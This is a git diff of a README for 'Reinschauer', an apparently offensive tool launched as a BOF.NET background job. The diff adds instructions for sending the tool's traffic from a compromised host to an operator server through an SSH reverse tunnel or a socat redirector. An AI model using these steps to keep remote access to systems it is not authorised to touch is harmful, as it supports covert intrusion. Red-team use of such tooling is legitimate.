ps1337/reinschauer/README.md

 ### Sending Traffic to Another Server

 - Set the session to interactive: `sleep 0`.
-- Execute Reinschauer in background: `bofnet_job XXXXXX <Server IP> <Server Port> true`.
-The boolean parameter enabled TLS usage.
+- Execute Reinschauer in background: `bofnet_job reinschauer_dotnet.BofStuff <Server IP> <Server Port> true`.
+The boolean parameter enables TLS usage.
 - To kill Reinschauer, use `bofnet_jobkill <Job ID>`.

+Then, use SSH and the [GatewayPorts](https://man.openbsd.org/sshd_config#GatewayPorts) feature: Add `GatewayPorts: clientspecified` to `sshd_config` and restart the SSH server.
+Then, `ssh -R '0.0.0.0:8080:localhost:6969'' [...]` will make your local port `6969` available on `0.0.0.0:8080`.
+Then, start the client with the required parameters or hardcode them.
+Be careful :)

-Then, set up a `socat` redirector on the Server:
+or, set up a `socat` redirector on the Server:

 ```bash
 socat TCP4-LISTEN:<Server Port>,fork TCP4:127.0.0.1:6969